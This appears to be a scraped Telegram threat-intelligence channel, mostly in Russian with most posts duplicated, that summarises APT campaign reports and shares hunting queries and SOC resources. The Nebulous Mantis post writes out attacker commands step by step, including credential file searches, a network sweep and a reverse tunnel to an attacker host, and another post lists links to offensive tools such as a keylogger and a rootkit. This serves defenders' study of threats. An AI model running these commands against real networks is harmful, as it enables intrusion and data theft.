Threat Hunting Father
03.05.202511:47
Inside the Latest Espionage Campain of Nebulous Mantis
Группа: Nebulous Mantis (a.k.a. Cuba, STORM-0978, UNC2596)
RAT: RomCom (с 2022), ранее Hancitor
Цель: разведка, компрометация критической инфраструктуры и оборонных организаций
Финал: шифрование как прикрытие (Cuba → Industrial Spy → Team Underground)
Что по командам:
Имитированная OneDrive-страница
ZIP с
2. Execution — T1204.002 / T1059.001
Проверка имени EXE на совпадение с hardcoded hash
Проверка активности юзера:
3. Persistence — T1546.015 (COM Hijack)
4. Defense Evasion / Profiling — T1082
5. Credential Access — T1119 / T1087.001
6. Discovery
Domain Accounts — T1087.002
7. Lateral Movement — T1021.001
8. Collection / Staging — T1005 / T1560.001
9. C2 / Tunneling — T1572 / T1090.001
10. Exfiltration — T1041
🔗https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis/overview
🦔 THF
Группа: Nebulous Mantis (a.k.a. Cuba, STORM-0978, UNC2596)
RAT: RomCom (с 2022), ранее Hancitor
Цель: разведка, компрометация критической инфраструктуры и оборонных организаций
Финал: шифрование как прикрытие (Cuba → Industrial Spy → Team Underground)
Что по командам:
1. Initial Access — T1566.002Целевая рассылка ссылок:
drivepoint.pub → cloud1dv.comИмитированная OneDrive-страница
ZIP с
.exe + .lnk2. Execution — T1204.002 / T1059.001
c:\users\public\mfc86.exe c:\users\public\temp-log test7812
Evasion-чеки:Проверка имени EXE на совпадение с hardcoded hash
Проверка активности юзера:
HKCU\...\RecentDocs > 553. Persistence — T1546.015 (COM Hijack)
reg query "HKCU\Software\Classes\CLSID\{GUID}\InProcServer32"
4. Defense Evasion / Profiling — T1082
tzutil /g
systeminfo
5. Credential Access — T1119 / T1087.001
findstr /s /m "password" "C:\Users\{USERNAME}\Documents\*.txt"
net localgroup administrators
whoami /all
quser
6. Discovery
Domain Accounts — T1087.002
AD Explorer: mfc86.exe -accepteula -snapshot "" log.dat
Trust & Net Discovery — T1482 / T1046 / T1049 / T1016nltest /domain_trusts
for /L %i in (1,1,254) do ping -n 1 -w 300 192.168.1.%i | find "TTL=" >> 1.txt
netstat -ano && arp -a
tracert google.com
nslookup 192.168.76.253
net view /all \\VICTIMSVR1
ipconfig /all
7. Lateral Movement — T1021.001
net use * \\{TARGET_WEBDAV_IP}@80\share
8. Collection / Staging — T1005 / T1560.001
mfc86x.exe a music\1.rar -y -r -v50000k C:\Users\{USERNAME}\Desktop
fsutil fsinfo drives
powershell -c get-volume
9. C2 / Tunneling — T1572 / T1090.001
sample.exe -R 25671:{INTERNAL_IP}:3389 root@{ATTACKER_IP} -P 56777
10. Exfiltration — T1041
🔗https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis/overview
🦔 THF
28.04.202505:20
Hunting Scheduled Tasks
Scheduled tasks are a normal part of system operations — they help with updates, backups, and maintenance jobs.
But attackers love them too. They often use scheduled tasks to make their tools run repeatedly, stay hidden, or survive reboots.
🔗https://cherrabinesrine.github.io/posts/Hunting_Scheduled_Tasks/
🦔THF
Scheduled tasks are a normal part of system operations — they help with updates, backups, and maintenance jobs.
But attackers love them too. They often use scheduled tasks to make their tools run repeatedly, stay hidden, or survive reboots.
from logs-system.security-default-*
| where @timestamp > now() - 7 day
| where host.os.family == "windows" and event.code == "4698" and event.action == "scheduled-task-created"
/* parsing unstructured data from winlog message to extract a scheduled task Exec command */
| grok message "(?<command><command>.+)" | eval Command = replace(Command, "(<command>|)", "")
| where Command is not null
/* normalise task name by removing usersid and uuid string patterns */
| eval TaskName = replace(winlog.event_data.TaskName, """((-S-1-5-.*)|\{[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\})""", "")
/* normalise task name by removing random patterns in a file path */
| eval Task_Command = replace(Command, """(ns[a-z][A-Z0-9]{3,4}\.tmp|DX[A-Z0-9]{3,4}\.tmp|7z[A-Z0-9]{3,5}\.tmp|[0-9\.\-\_]{3,})""", "")
/* normalize user home profile path */
| eval Task_Command = replace(Task_Command, """[cC]:\\[uU][sS][eE][rR][sS]\\[a-zA-Z0-9\.\-\_\$~]+\\""", "C:\\\\users\\\\user\\\\")
| where Task_Command like "?*" and not starts_with(Task_Command, "C:\\Program Files") and not starts_with(Task_Command, "\"C:\\Program Files")
| stats tasks_count = count(*), hosts_count = count_distinct(host.id) by Task_Command, TaskName
| where hosts_count == 1
🔗https://cherrabinesrine.github.io/posts/Hunting_Scheduled_Tasks/
🦔THF
23.04.202511:11
Playbook’s
Коллекция практических плейбуков для SOC-аналитиков по расследованию инцидентов. Стандартизированные шаги, примеры и полезные рекомендации.
🔗https://github.com/socfortress/Playbooks/tree/main
🦔THF
Коллекция практических плейбуков для SOC-аналитиков по расследованию инцидентов. Стандартизированные шаги, примеры и полезные рекомендации.
🔗https://github.com/socfortress/Playbooks/tree/main
🦔THF
Reposted from:
Сертификат безопасности
19.04.202512:25
⚡️KazInfoSec - подборка личных TG-каналов казахстанского ИБ-комьюнити 💭
https://t.me/addlist/kI9Bkz-4Bs41ZmRi
https://t.me/addlist/kI9Bkz-4Bs41ZmRi
08.04.202512:17
How ToddyCat tried to hide behind AV software 🔦
Когда дело доходит до кибершпионажа, APT группы часто начинают мимикрировать/эксплуатировать антивирусное ПО, чтобы их было сложней найти.
ToddyCat , исполнили такой трюк, запустив свой инструмент TCESB в контексте решения по обеспечению безопасности.
(Attackers use a DLL-proxying technique (Hijack Execution Flow, T1574) to run the malicious code.)
В утилите ESET Command line scanner динамический анализ показал, что сканер небезопасно загружает DLL, сначала проверяя файл в текущем каталоге, а затем выполняя его поиск в системных каталогах. Это может привести к загрузке вредоносной библиотеки DLL, что представляет собой уязвимость - CVE-2024-11859 - (21 января 2025 вендор исправил) Ну а далее когда атакер успешно подгрузил код библиотеки, остается фантазировать)
Найденный инструмент использует цепочку уязвимостей, а также старую версию известного вредоносного ПО с открытым исходным кодом, которую злоумышленники модифицировали, чтобы расширить ее функциональность.
Про цепочку атаки и другие подробности⬇️
🔗https://securelist.com/toddycat-apt-exploits-vulnerability-in-eset-software-for-dll-proxying/116086/
🦔THF
Когда дело доходит до кибершпионажа, APT группы часто начинают мимикрировать/эксплуатировать антивирусное ПО, чтобы их было сложней найти.
ToddyCat , исполнили такой трюк, запустив свой инструмент TCESB в контексте решения по обеспечению безопасности.
(Attackers use a DLL-proxying technique (Hijack Execution Flow, T1574) to run the malicious code.)
В утилите ESET Command line scanner динамический анализ показал, что сканер небезопасно загружает DLL, сначала проверяя файл в текущем каталоге, а затем выполняя его поиск в системных каталогах. Это может привести к загрузке вредоносной библиотеки DLL, что представляет собой уязвимость - CVE-2024-11859 - (21 января 2025 вендор исправил) Ну а далее когда атакер успешно подгрузил код библиотеки, остается фантазировать)
Найденный инструмент использует цепочку уязвимостей, а также старую версию известного вредоносного ПО с открытым исходным кодом, которую злоумышленники модифицировали, чтобы расширить ее функциональность.
Про цепочку атаки и другие подробности⬇️
🔗https://securelist.com/toddycat-apt-exploits-vulnerability-in-eset-software-for-dll-proxying/116086/
🦔THF
04.04.202506:04
UAC-0219: кибершпионаж с использованием PowerShell-стилера WRECKSTEEL (CERT-UA#14283)
🔗https://cert.gov.ua/article/6282902
🦔THF
CERT-UA пишут что в течение марта 2025 года зафиксировано по меньшей мере три кибератаки в отношении органов государственного управления и объектов критической инфраструктуры Украины, целью которых был сбор и похищение информации с компьютеров с применением соответствующих программных средств.
Атаки проходили с использованием скомпрометированных учетных записей осуществляется распространение электронных писем со ссылками на публичные файловые сервисы DropMeFiles, Google Drive и другие (иногда ссылки содержатся в PDF-вложения), переход по которым приводит к загрузке и запуску VBScript-загрузчика (обычно имеет расширение ".js"). Его назначение — загрузка и запуск PowerShell-скрипта, который выполняет поиск и выгрузку с помощью cURL файлов с определенными расширениями (".doc", ".txt", ".docx", ".xls", ".xlsx", ".pdf", ".rtf", ".odt", ".csv", ".ods", ".ppt", ".pptx", ".png", ".jpg", "*.jpeg"), а также снимков экрана компьютера.
Детальное исследование киберугрозы позволило сделать вывод, что описанная активность ведется, как минимум, с осени 2024 года. При этом, в течение 2024 года во время осуществления кибератак использовались EXE-файлы, созданные с помощью NSIS-инсталлятора, которые содержали документ-приманку (PDF, JPG), VBScript-стилер, а также программу-графический редактор "IrfanView", использовавшуюся для создания скриншотов (следует отметить, что с 2025 года функция создания снимков экрана реализована с помощью PowerShell).
Основное программное средство, версии которого известны на языках программирования VBScript и PowerShell и которое предназначено для похищения файлов, классифицировано как WRECKSTEEL.
Активность отслеживается под идентификатором UAC-0219.
🔗https://cert.gov.ua/article/6282902
🦔THF
29.04.202506:44
EARTH KURMA APT CAMPAIGN TARGETS SOUTHEAST ASIAN GOVERNMENT AND TELECOM SECTORS
Earth Kurma —
⛏️Ключевые векторы атаки
🛠 Набор инструментов и этапы атаки
Инструменты для кражи данных:
📍 Инфраструктура и атрибуция
Анализ атрибуции:
🔗Trend Micro — Earth Kurma APT Campaign
Атакующие все чаще не парятся и используют инструменты гитхаб, так что Red Team, хватит постить инструменты 🤣
Earth Kurma — Инструменты и GitHub-аналоги
NBTScan — https://github.com/resurrecting-open-source-projects/nbtscan
LADON — https://github.com/k8gege/Ladon
FRPC — https://github.com/fatedier/frp
WMIHACKER — https://github.com/HotZero/WMIHACKER
ICMPinger — https://github.com/Snawoot/icmping
KMLOG — https://github.com/D4Vinci/Keylogger
TESDAT — публичного аналога нет
SIMPOBOXSPY — публичного аналога нет
KRNRAT — https://github.com/Cr4sh/s7e3
MORIYA — описание: https://securelist.com/tunnelsnake-espionage-under-the-hood/101831/
🦔 THF
Earth Kurma —
это APT-группировка, осуществляющая операции кибершпионажа с ноября 2020 года.
С июня 2024 года их активность усилилась: основными целями стали правительственные структуры и телекоммуникационные компании в Юго-Восточной Азии, особенно на Филиппинах, во Вьетнаме, Таиланде и Малайзии.
⛏️Ключевые векторы атаки
Начальный доступ:
Точные векторы первоначального проникновения установить не удалось, поскольку анализ велся ретроспективно.
Инструменты для перемещения по сети:
• NBTScan — сканирование сети
• LADON — фреймворк для тестирования на проникновение
• FRPC — обратный прокси-сервер
• WMIHACKER — эксплуатация Windows Management Instrumentation
• ICMPinger — обнаружение устройств в сети через ICMP-пакеты
Кража учетных данных:
• KMLOG — кейлоггер для перехвата пользовательских данных
🛠 Набор инструментов и этапы атаки
Инструменты для кражи данных:
• TESDAT — кастомная утилита для сбора и эксфильтрации информации
• SIMPOBOXSPY — ПО для сбора и хищения данныхRootkit-компоненты:
• KRNRAT — руткит на уровне ядра для сохранения доступа
• MORIYA — пассивный бэкдор для скрытого управления системой (ранее замечен в операции TunnelSnake)Каналы эксфильтрации данных:
Использование легитимных облачных сервисов Dropbox и OneDrive для скрытой передачи данных за пределы сети.
📍 Инфраструктура и атрибуция
Анализ атрибуции:
• Наблюдаются сходства между MORIYA и инструментами из операции TunnelSnake.
• Пересечения между SIMPOBOXSPY и инструментами APT-группы ToddyCat.
• Однако особенности применения инструментов и тактики позволяют предположить, что Earth Kurma действует как отдельная группировка.
🔗Trend Micro — Earth Kurma APT Campaign
Атакующие все чаще не парятся и используют инструменты гитхаб, так что Red Team, хватит постить инструменты 🤣
Earth Kurma — Инструменты и GitHub-аналоги
NBTScan — https://github.com/resurrecting-open-source-projects/nbtscan
LADON — https://github.com/k8gege/Ladon
FRPC — https://github.com/fatedier/frp
WMIHACKER — https://github.com/HotZero/WMIHACKER
ICMPinger — https://github.com/Snawoot/icmping
KMLOG — https://github.com/D4Vinci/Keylogger
TESDAT — публичного аналога нет
SIMPOBOXSPY — публичного аналога нет
KRNRAT — https://github.com/Cr4sh/s7e3
MORIYA — описание: https://securelist.com/tunnelsnake-espionage-under-the-hood/101831/
🦔 THF
24.04.202507:49
Billbug: Intrusion Campaign Against Southeast Asia Continues
Инструменты:
Да, атакующие опять используют софт антивирусных компаний на этот раз TrendMicro и Bitdefender, атакующие мимикрируют - загружают вредоносные DLL.🥣
Поищите у себя события загрузки модулей от исполняемых файлов:
🔗https://www.security.com/threat-intelligence/billbug-china-espionage
🦔THF
The Billbug espionage group (aka Lotus Blossom, Lotus Panda, Bronze Elgin) compromised multiple organizations in a single Southeast Asian country during an intrusion campaign that ran between August 2024 and February 2025. Targets included a government ministry, an air traffic control organization, a telecoms operator, and a construction company.
Инструменты:
- DLL sideloading: Злоумышленники использовали легитимные исполняемые файлы от
Trend Micro
и
Bitdefender
для загрузки вредоносных DLL.
- Sagerunex: Обновлённая версия бэкдора с механизмом постоянства через реестр.
- ChromeKatz и CredentialKatz: Инструменты для кражи учётных данных и cookies из браузера Chrome.
- Reverse SSH Tool: Пользовательский инструмент, слушающий соединения на порту 22.
- Zrok: P2P-инструмент для удалённого доступа к внутренним сервисам.
- datechanger.exe: Утилита для изменения временных меток файлов.
Да, атакующие опять используют софт антивирусных компаний на этот раз TrendMicro и Bitdefender, атакующие мимикрируют - загружают вредоносные DLL.🥣
Поищите у себя события загрузки модулей от исполняемых файлов:
1) tmdbglog.exe - > load - tmdglog.dll - > read - C:\Windows\temp\TmDebug.log
2) bds.exe -> load - log.dll -> read - winnt.config
3) Ну и запуски других процессов от вредоносной цепочки)
🔗https://www.security.com/threat-intelligence/billbug-china-espionage
🦔THF
22.04.202510:51
Heheh 😏
(Sample SHA1: 2E33DFC94B8B2AFFF1CA73AF9516F0D649DF0282)
🔗https://x.com/tangent65536/status/1914373135337701588?s=46
🔗https://www.virustotal.com/gui/file/d719cb6f0288867122e8780c2e326952b1858036f7a036821d77e2e7443fe2fb/detection
🦔THF
Mimikatz with a valid signature from... McDonald's? When did McDelivery put mimikatz on their menu?!
(Sample SHA1: 2E33DFC94B8B2AFFF1CA73AF9516F0D649DF0282)
🔗https://x.com/tangent65536/status/1914373135337701588?s=46
🔗https://www.virustotal.com/gui/file/d719cb6f0288867122e8780c2e326952b1858036f7a036821d77e2e7443fe2fb/detection
🦔THF
19.04.202506:39
Kimsuky, Konni, Lazarus — март 2025
В марте ASEC зафиксировал активность APT групп: Kimsuky, Konni и Lazarus
Инструменты и техники:
1. Kimsuky
Инструменты:
OLE-объекты в HWP-документах
VBScript / Task Scheduler
Техники:
Загрузка .manifest и выполнение скриптов
Устойчивость через планировщик заданий
2. Konni
3. Lazarus
🔗: ASEC Report – март 2025
🦔 THF
В марте ASEC зафиксировал активность APT групп: Kimsuky, Konni и Lazarus
Инструменты и техники:
1. Kimsuky
Тема:фальшивые документы об образовательных программах
Инструменты:
document.bat, 0304.exe, 0304_1.exeOLE-объекты в HWP-документах
VBScript / Task Scheduler
Техники:
Загрузка .manifest и выполнение скриптов
Устойчивость через планировщик заданий
2. Konni
Тема:
рассылка LNK-файлов, маскирующихся под документы
Инструменты:
AsyncRAT
PowerShell / VBScript / LNK
Комбинация скриптов и скрытые команды
Техники:
Многоуровневая загрузка
Динамические URL и обфускация
Самоудаление следов
Маскировка под
.docx
3. Lazarus
Сценарий 1: Атаки на IIS-серверы (Южная Корея)
Инструменты:
Web shell “RedHat Hacker”
LazarLoader
UACMe
Техники:
Загрузка shell через уязвимость
Выполнение C2-команд
Повышение привилегий
Сценарий 2: npm-атаки
Инструменты:
Зловреды:
BeaverTail
,
InvisibleFerret
Пакеты:
is-buffer-validator
,
auth-validator
,
event-handle-package
GitHub-репозитории
Техники:
Typosquatting
Загрузка и выполнение вредоносного JS-кода при установке
Сценарий 3: Атаки на криптокомпании
Инструменты:
GolangGhost
— бэкдор на Go
FrostyFerret
— стилер для macOS
BeaverTail / InvisibleFerret
— кража данных и кейлоггер
FriendlyFerret / FlexibleFerret / FrostyFerret
— вариации под macOS
nvidia.js
— NodeJS-загрузчик
Техники:
Социальная инженерия (фальшивые интервью)
Метод
ClickFix
Вызов PowerShell, curl, bash, wscript для загрузки и выполнения полезной нагрузки
🔗: ASEC Report – март 2025
🦔 THF
07.04.202518:40
Windows Remote Desktop Protocol: Remote to Rogue
Супер интересный вектор, а также рекомендации от ресерчеров 🔥
🔗https://cloud.google.com/blog/topics/threat-intelligence/windows-rogue-remote-desktop-protocol
🦔THF
The campaign employed signed .rdp file attachments to establish Remote Desktop Protocol (RDP) connections from victims' machines. Unlike typical RDP attacks focused on interactive sessions, this campaign creatively leveraged resource redirection (mapping victim file systems to the attacker servers) and RemoteApps (presenting attacker-controlled applications to victims). Evidence suggests this campaign may have involved the use of an RDP proxy tool like PyRDP to automate malicious activities like file exfiltration and clipboard capture.
Супер интересный вектор, а также рекомендации от ресерчеров 🔥
🔗https://cloud.google.com/blog/topics/threat-intelligence/windows-rogue-remote-desktop-protocol
🦔THF
03.04.202515:45
Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457)
Свежая эксплуатация и интересные семейства вредоносов🐱
🔗 https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability
🦔THF
On Thursday, April 3, 2025, Ivanti disclosed a critical security vulnerability, CVE-2025-22457, impacting Ivanti Connect Secure (“ICS”) VPN appliances version 22.7R2.5 and earlier. CVE-2025-22457 is a buffer overflow vulnerability, and successful exploitation would result in remote code execution. Mandiant and Ivanti have identified evidence of active exploitation in the wild against ICS 9.X (end of life) and 22.7R2.5 and earlier versions. Ivanti and Mandiant encourage all customers to upgrade as soon as possible.
Свежая эксплуатация и интересные семейства вредоносов🐱
The earliest evidence of observed CVE-2025-22457 exploitation occurred in mid-March 2025. Following successful exploitation, we observed the deployment of two newly identified malware families, the TRAILBLAZE in-memory only dropper and the BRUSHFIRE passive backdoor. Additionally, deployment of the previously reported
SPAWN ecosystem of malware
attributed to UNC5221 was also observed.
🔗 https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability
🦔THF
29.04.202505:28
EDR Telemetry Scores
Окей с топом EDR по мнению ransomware operator разобрались 🥲
Вот топ EDR проектов по мнению
EDR Telemetry Project
Энтузиасты тестируют и наглядно в таблички ложат информацию о том что их не устраивает в EDR продуктах 🕺
Даже есть формула оценки😺
Конечно это не отвечает на вопрос легкости байпаса решений!
🔗https://www.edr-telemetry.com/scores
🦔THF
Окей с топом EDR по мнению ransomware operator разобрались 🥲
Вот топ EDR проектов по мнению
EDR Telemetry Project
Энтузиасты тестируют и наглядно в таблички ложат информацию о том что их не устраивает в EDR продуктах 🕺
Даже есть формула оценки😺
Конечно это не отвечает на вопрос легкости байпаса решений!
🔗https://www.edr-telemetry.com/scores
🦔THF
24.04.202505:30
🔍 ClickGrab Analyzer
Analyze websites for potential ClickFix/FakeCAPTCHA phishing techniques. This tool helps identify malicious web pages that may be attempting to trick users with fake CAPTCHA verification or other social engineering techniques.
🔗https://clickgrab.streamlit.app/
🦔THF
Analyze websites for potential ClickFix/FakeCAPTCHA phishing techniques. This tool helps identify malicious web pages that may be attempting to trick users with fake CAPTCHA verification or other social engineering techniques.
🔗https://clickgrab.streamlit.app/
🦔THF
22.04.202510:51
17.04.202505:46
Waiting Thread Hijacking: A Stealthier Version of Thread Execution Hijacking
- Process Injection is one of the important techniques in the attackers’ toolkit. In the constant cat-and-mouse game, attackers try to invent its new implementations that bypass defenses, using creative methods and lesser-known APIs.
- Combining common building blocks in an atypical way, Check Point Research was able to create a much stealthier version of a known method, Thread Execution Hijacking.
Waiting Thread Hijacking involves handles with the following access:
Used APIs:
CheckPoint^-^
🔗 https://research.checkpoint.com/2025/waiting-thread-hijacking/
🐱POC: https://github.com/hasherezade/waiting_thread_hijacking
🦔THF
- Process Injection is one of the important techniques in the attackers’ toolkit. In the constant cat-and-mouse game, attackers try to invent its new implementations that bypass defenses, using creative methods and lesser-known APIs.
- Combining common building blocks in an atypical way, Check Point Research was able to create a much stealthier version of a known method, Thread Execution Hijacking.
Waiting Thread Hijacking involves handles with the following access:
- For the target process: PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE
- For the target thread: THREAD_GET_CONTEXT
Used APIs:
- NtQuerySystemInformation (with a parameter of SystemProcessInformation )
- GetThreadContext
- ReadProcessMemory
- VirtualAllocEx
- WriteProcessMemory
- VirtualProtectEx
CheckPoint^-^
were able to inject a payload and run it without being noticed by most tested EDRs (Endpoint Detection & Response systems)
🔗 https://research.checkpoint.com/2025/waiting-thread-hijacking/
🐱POC: https://github.com/hasherezade/waiting_thread_hijacking
🦔THF
Reposted from:
s0ld13r ch.
06.04.202513:37
Threat Intelligence drop ragghhhh 🕺🕺
Рефлексируя тематику этого канала, решил запустить небольшой комьюнити проект для шейра индикаторов компрометации и угроз которые таргетят Центральную Азию (и не только) 💃
Думаю это логичное продолжение тематики TI на канале, чтобы где то можно было собрать все находки и передавать их комьюнити ❤️
В скором времени начну активно добавлять IoC с различных исследований, фидов и залью индикаторы которые смог найти в предыдущих постах 😎
Буду рад вкладу каждого в развитие TI платформы (на базе MISP) — можно присылать свои находки, ссылки на репорты, дампы, фиды и просто идеи. Даже маленький IoC может оказаться критически важным для других, все абсолютно бесплатно и на безвозмездной основе, если будет желание подключиться и помочь то мой лс всегда открыт 😸
Рад представить вам threatintel.kz 👋
🧢 s0ld13r
Рефлексируя тематику этого канала, решил запустить небольшой комьюнити проект для шейра индикаторов компрометации и угроз которые таргетят Центральную Азию (и не только) 💃
Думаю это логичное продолжение тематики TI на канале, чтобы где то можно было собрать все находки и передавать их комьюнити ❤️
В скором времени начну активно добавлять IoC с различных исследований, фидов и залью индикаторы которые смог найти в предыдущих постах 😎
Буду рад вкладу каждого в развитие TI платформы (на базе MISP) — можно присылать свои находки, ссылки на репорты, дампы, фиды и просто идеи. Даже маленький IoC может оказаться критически важным для других, все абсолютно бесплатно и на безвозмездной основе, если будет желание подключиться и помочь то мой лс всегда открыт 😸
Рад представить вам threatintel.kz 👋
🧢 s0ld13r
03.04.202510:52
Extra TTP! 😠
Initial Access (TA0001) в MITRE ATT&CK — это тактики и техники, которые злоумышленники используют для первого проникновения в целевую систему или сеть.
Основные техники:
Phishing (T1566) – доставка вредоносных ссылок или файлов через email или соцсети.
Exploit Public-Facing Application (T1190) – эксплуатация уязвимостей в веб-приложениях.
Valid Accounts (T1078) – использование украденных или скомпрометированных учетных данных.
Drive-by Compromise (T1189) – заражение системы при посещении вредоносного сайта.
Supply Chain Compromise (T1195) – внедрение вредоносного кода через сторонних поставщиков.
External Remote Services (T1133) – доступ через удаленные сервисы (VPN, RDP, SSH).
Hardware Additions (T1200) – подключение зараженных устройств (USB, сетевое оборудование).
Initial Access — ключевой этап атаки, после которого злоумышленники переходят к закреплению в системе (Persistence) и дальнейшему движению по сети (Lateral Movement).
🦔THF
Initial Access (TA0001) в MITRE ATT&CK — это тактики и техники, которые злоумышленники используют для первого проникновения в целевую систему или сеть.
Основные техники:
Phishing (T1566) – доставка вредоносных ссылок или файлов через email или соцсети.
Exploit Public-Facing Application (T1190) – эксплуатация уязвимостей в веб-приложениях.
Valid Accounts (T1078) – использование украденных или скомпрометированных учетных данных.
Drive-by Compromise (T1189) – заражение системы при посещении вредоносного сайта.
Supply Chain Compromise (T1195) – внедрение вредоносного кода через сторонних поставщиков.
External Remote Services (T1133) – доступ через удаленные сервисы (VPN, RDP, SSH).
Hardware Additions (T1200) – подключение зараженных устройств (USB, сетевое оборудование).
Initial Access — ключевой этап атаки, после которого злоумышленники переходят к закреплению в системе (Persistence) и дальнейшему движению по сети (Lateral Movement).
🦔THF
28.04.202505:35
EDR Tier list 🤔
Something interesting 😾
Whaat?🤩
Technical details pls🔍
🔗https://x.com/PsExec64/status/1916205645507842525
🦔THF
Something interesting 😾
EDR Tier list rated by a ransomware operator. Ranked by difficulty to bypass.
Whaat?🤩
Technical details pls🔍
🔗https://x.com/PsExec64/status/1916205645507842525
🦔THF
23.04.202511:31
APT-группа «забыла» сервер — утекли эксплойты, шеллы
APT-группа допустила редкую для себя оплошность — на короткое время неправильно настроила C2-сервер, связанный с вредоносом KEYPLUG. Команда Hunt Intelligence успела проанализировать содержимое сервака.
Кто за этим стоит:
Исследователи связывают инфраструктуру с группировкой RedGolf (пересекается с APT41), давно известной своими кампаниями против правительственных и телеком-секторов.
Что утекло:
KEYPLUG — модульный бекдор с поддержкой HTTP(S)/TCP/SMB C2 и функционалом удалённого управления.
Эксплойты Fortinet — включая скрипты для эксплуатации CVE-2022-42475 и других уязвимостей в FortiGate/SSL-VPN.
PHP вебшеллы — упрощённый доступ и закреплерие после компрометации.
Скрипты разведки и подготовки — в том числе нацеленные на крупную японскую организацию.
Сервер был доступен менее суток, но успел показать: за «тихой работой» APT стоит чёткая структура подготовки и развертывания — всё это отразилось в обнажённых артефактах.
🔗: hunt.io/blog/keyplug-server-exposes-fortinet-exploits-webshells
🦔 THF
APT-группа допустила редкую для себя оплошность — на короткое время неправильно настроила C2-сервер, связанный с вредоносом KEYPLUG. Команда Hunt Intelligence успела проанализировать содержимое сервака.
Кто за этим стоит:
Исследователи связывают инфраструктуру с группировкой RedGolf (пересекается с APT41), давно известной своими кампаниями против правительственных и телеком-секторов.
Что утекло:
KEYPLUG — модульный бекдор с поддержкой HTTP(S)/TCP/SMB C2 и функционалом удалённого управления.
Эксплойты Fortinet — включая скрипты для эксплуатации CVE-2022-42475 и других уязвимостей в FortiGate/SSL-VPN.
PHP вебшеллы — упрощённый доступ и закреплерие после компрометации.
Скрипты разведки и подготовки — в том числе нацеленные на крупную японскую организацию.
Сервер был доступен менее суток, но успел показать: за «тихой работой» APT стоит чёткая структура подготовки и развертывания — всё это отразилось в обнажённых артефактах.
🔗: hunt.io/blog/keyplug-server-exposes-fortinet-exploits-webshells
🦔 THF
22.04.202505:01
Around the World in 90 Days: State-Sponsored Actors Try ClickFix 👆
ClickFix —
Что нашли Proofpoint:
Итого:
В таких атаках будет зависеть, завоюет ли внимание пользователя атакующий 😁
🔗 https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix
🦔THF
ClickFix —
это техника социальной инженерии, в рамках которой используются диалоговые окна с инструкциями для копирования, вставки и запуска вредоносных команд на устройстве жертвы. Эта методика включает не только поддельные сообщения об ошибке (в качестве "проблемы"), но и якобы системные уведомления с авторитетными инструкциями (в качестве "решения"), которые выглядят как рекомендации от самой операционной системы.
Что нашли Proofpoint:
• Изначально техника ClickFix была связана в основном с киберпреступниками, исследователи Proofpoint впервые зафиксировали её использование государственными APT-группами в ряде кампаний.
• В период — с конца 2024 года по начало 2025-го — группы из Северной Кореи, Ирана и России применяли технику ClickFix в своих атаках.
• Интеграция ClickFix не изменила радикально сами кампании, проводимые TA427, TA450, UNK_RemoteRogue и TA422, но стала заменой этапов установки и исполнения вредоносного кода в уже существующих цепочках заражения.
Итого:
•
ClickFix
не доставляет вредоносное ПО напрямую, а лишь трекает и маскирует ссылки — используется как элемент социальной инженерии и инструмент обхода фильтров.
• Использование
multi-stage infection
— часто первая стадия «чистая» (лишь переход или подмена шаблона), а вредоносная активность начинается позже.
• Почти все цепочки завязаны на
low-observable delivery
, включая отсутствие вложений и доверие на пользовательские действия (клик, логин, разрешение макросов).
В таких атаках будет зависеть, завоюет ли внимание пользователя атакующий 😁
🔗 https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix
🦔THF
16.04.202509:39
Оставлю это тутъ👽
🔗https://github.com/CVEProject/cvelistV5
🦔THF
🔗https://github.com/CVEProject/cvelistV5
🦔THF
06.04.202507:44
02.04.202508:38
Rule-ATT&CK Mapper (RAM): Mapping SIEM Rules to TTPs Using LLMs 🤖
Ну что? AI будем интегрировать?
🔗https://arxiv.org/html/2502.02337v1
🦔THF
Ну что? AI будем интегрировать?
🔗https://arxiv.org/html/2502.02337v1
🦔THF
Shown 1 - 24 of 96
Log in to unlock more functionality.